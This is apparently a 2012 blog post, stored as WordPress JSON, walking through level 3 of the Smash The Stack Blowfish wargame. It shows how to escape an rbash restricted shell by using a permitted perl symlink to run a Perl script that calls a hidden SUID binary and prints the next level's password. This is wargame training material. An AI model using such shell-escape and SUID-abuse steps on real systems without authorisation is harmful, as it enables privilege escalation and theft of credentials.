{"id":48,"date":"2012-07-20T02:22:35","date_gmt":"2012-07-20T09:22:35","guid":{"rendered":"http:\/\/seanmurphree.com\/blog\/?p=48"},"modified":"2012-07-20T02:22:35","modified_gmt":"2012-07-20T09:22:35","slug":"blowfish-level3-dont-forget-where-you-came-from","status":"publish","type":"post","link":"https:\/\/seanmurphree.com\/blog\/?p=48","title":{"rendered":"Blowfish Level3 &#8211; Don&#8217;t forget where you came from"},"content":{"rendered":"<p>Welcome back. \u00a0Today we&#8217;re going to be looking at level3 of the <a title=\"Blowfish\" href=\"http:\/\/blowfish.smashthestack.org:81\/\" target=\"_blank\">Blowfish<\/a> wargame from <a title=\"Smash The Stack\" href=\"http:\/\/www.smashthestack.org\" target=\"_blank\">Smash The Stack<\/a>. \u00a0Since this is level3, I&#8217;ll assume you have the password from completing level2. \u00a0Also, as always, the password will be stripped from this page and replaced with Y&#8217;s. Now, let&#8217;s ssh in and get started.<\/p>\n<p>Upon logging in we see a banner message,<\/p>\n<blockquote><p>You are in a restricted shell. If you can break out of it, you need to find the backdoor hidden somewhere in the system. find it and cat \/pass\/level4<\/p><\/blockquote>\n<p>Ok, sounds like level 3 so far. \u00a0Let&#8217;s check what we can find, and perhaps what this restricted shell is.<\/p>\n<blockquote><p>level3@blowfish:~$ find \/ -user level4 -group level3 2&gt;\/dev\/null<br \/>\n-rbash: \/dev\/null: restricted: cannot redirect output<br \/>\nlevel3@blowfish:~$ find \/ -user level4 -group level3<br \/>\n-rbash: find: command not found<br \/>\nlevel3@blowfish:~$ pwd<br \/>\n\/home\/level3<br \/>\nlevel3@blowfish:~$ ls<br \/>\n-rbash: ls: command not found<br \/>\nlevel3@blowfish:~$ \/usr\/ls<br \/>\n-rbash: \/usr\/ls: restricted: cannot specify `\/&#8217; in command names<\/p><\/blockquote>\n<p>Interesting. \u00a0We can&#8217;t use find or ls, or include slashes in our commands. \u00a0So let&#8217;s see if we can&#8217;t scope out this restricted shell more. \u00a0We can google and read up on <a title=\"rbash\" href=\"http:\/\/man.he.net\/man1\/rbash\" target=\"_blank\">rbash<\/a>, but let&#8217;s also experiment.<\/p>\n<blockquote><p>level3@blowfish:~$ pwd<br \/>\n\/home\/level3<br \/>\nlevel3@blowfish:~$ echo $PATH<br \/>\n\/home\/rbash<\/p><\/blockquote>\n<p>Now we really need to find out what is in \/home\/rbash to see which program we might be able to execute or use. \u00a0Let&#8217;s open up another PuTTy window, connect to blowfish again, but this time as level2! \u00a0Once there, let&#8217;s look around. \u00a0First we want to try to find this talked about back door. \u00a0Second, we want to know what is in \/home\/rbash:<\/p>\n<blockquote><p>level2@blowfish:~$ find \/ -user level4 -group level3 2&gt;\/dev\/null<br \/>\n\/home\/level3\/.. \u00a0 \u00a0 \/cat_lvl4<br \/>\nlevel2@blowfish:~$ ls -la &#8220;\/home\/level3\/.. \u00a0 \u00a0 \/cat_lvl4&#8221;<br \/>\n-r-sr-x&#8212; 1 level4 level3 7460 2007-12-03 13:41 \/home\/level3\/.. \u00a0 \u00a0 \/cat_lvl4<br \/>\nlevel2@blowfish:~$ ls -la \/home\/rbash<br \/>\ntotal 8<br \/>\ndrwxr-xr-x 2 711 root 4096 2009-08-15 22:11 .<br \/>\ndrwxr-xr-x 22 l3thal root 4096 2009-08-09 23:35 ..<br \/>\nlrwxrwxrwx 1 711 root 8 2009-08-15 22:11 cat -&gt; \/bin\/cat<br \/>\nlrwxrwxrwx 1 711 root 13 2009-08-09 23:13 perl -&gt; \/usr\/bin\/perl<\/p><\/blockquote>\n<p>Alright, we found the SUID program we&#8217;re going to try to execute. \u00a0The name is odd and has spaces in the directory so we wrap it in quotes. \u00a0Also, we checked out \/home\/rbash and found two links, one to \/bin\/cat and one to \/usr\/bin\/perl. \u00a0So it looks like we&#8217;re probably going to be using these guys to hopefully break free of the restricted level3 shell! \u00a0How will we break free? Well we need to execute the cat_level4 file. \u00a0Best way to do that out of cat and perl, sounds like perl. \u00a0If we can make a perl file that calls the cat_level4 file, we should be in business. \u00a0So let&#8217;s jump on our level2 shell and do some programming. \u00a0(Remember to keep it in \/tmp and to clean up afterwards!)<\/p>\n<p>First let&#8217;s create a perl program, let&#8217;s call it test.pl. \u00a0In it we will simply call the program we want to execute. \u00a0The whole script is as follows:<\/p>\n<blockquote><p>level2@blowfish:\/tmp\/.somedir$ cat test.pl<br \/>\n#!\/usr\/bin\/perl<br \/>\nsystem(&#8216;\/home\/level3\/..\\ \\ \\ \\ \\ \/cat_lvl4&#8217;);<br \/>\nlevel2@blowfish:\/tmp\/.somedir$ chmod 777 test.pl<br \/>\nlevel2@blowfish:\/tmp\/.somedir$ ls -la test.pl<br \/>\n-rwxrwxrwx 1 level2 level2 62 2012-07-20 09:05 test.pl<\/p><\/blockquote>\n<p>Don&#8217;t forget to add executable permission for everyone, since we&#8217;re going to be running this program through perl on level3! \u00a0Now let&#8217;s switch back over to our level3 shell and run the script.<\/p>\n<blockquote><p>level3@blowfish:~$ perl \/tmp\/.somedir\/test.pl<br \/>\nYYYYYYYYYYY<\/p><\/blockquote>\n<p>Bam. \u00a0Seems like the cat_level4 program already runs cat \/pass\/level4 for us. \u00a0There we have it, the password for level4 and the end of level3. \u00a0So, while restricted shell, rbash, can make it more difficult to perform actions, it doesn&#8217;t make it impossible. \u00a0Obviously, we had to log-in to level2 to create the file and to look around. \u00a0However, who knows when there might be a similar script that calls a similar SUID program that is vulnerable to attack. \u00a0The successful attack is often the one delivered through an unexpected vector.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Welcome back. \u00a0Today we&#8217;re going to be looking at level3 of the Blowfish wargame from Smash The Stack. \u00a0Since this is level3, I&#8217;ll assume you have the password from completing level2. \u00a0Also, as always, the password will be stripped from &hellip; <a href=\"https:\/\/seanmurphree.com\/blog\/?p=48\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[16,6,4],"tags":[51,24,23,49,47],"_links":{"self":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/48"}],"collection":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=48"}],"version-history":[{"count":4,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/48\/revisions"}],"predecessor-version":[{"id":52,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/48\/revisions\/52"}],"wp:attachment":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=48"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=48"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=48"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}